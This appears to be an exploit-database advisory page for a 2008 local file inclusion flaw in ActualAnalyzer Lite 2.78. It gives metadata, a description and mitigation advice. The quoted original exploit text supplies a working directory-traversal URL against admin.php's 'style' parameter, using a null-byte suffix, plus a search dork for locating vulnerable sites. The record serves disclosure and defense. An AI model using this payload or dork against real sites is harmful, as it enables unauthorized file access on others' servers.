ActualAnalyzer Lite (free) 2.78 LOCAL FILE INCLUSION

vendor:

ActualAnalyzer Lite (free)

by:

IRCRASH (Dr.Crash Or Khashayar Fereidani)

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: ActualAnalyzer Lite (free)

Affected Version From: 2.78

Affected Version To: 2.78

Patch Exists: NO

Related CWE: N/A

CPE: a:actualscripts:actualanalyzer_lite_free:2.78

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ActualAnalyzer Lite (free) 2.78 LOCAL FILE INCLUSION

A vulnerability exists in ActualAnalyzer Lite (free) 2.78 which allows an attacker to include a file from the local file system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'style' parameter in 'admin.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with directory traversal sequences (e.g. '../') to the vulnerable script. This can allow the attacker to include and execute arbitrary local files on the vulnerable system.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.

Source

Exploit-DB raw data:

#####################################################################################
####                 ActualAnalyzer Lite (free) 2.78                             ####
####                    LOCAL FILE INCLUSION                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash Or Khashayar Fereidani)                                 #
#Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)                          #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
#####################################################################################
#                                                                                   #
#Script Download : http://actualscripts.com                                         #
#                                                                                   #
#DORK : "ActualAnalyzer Lite (free) 2.78"+"Copyright Â© 2006 ActualScripts"          #
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#LFI Address : http://Example/other/lite/admin.php?style=../../[FILE NAME]%00&language=ircrash
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
################################ TNX GOD ############################################

# milw0rm.com [2008-05-01]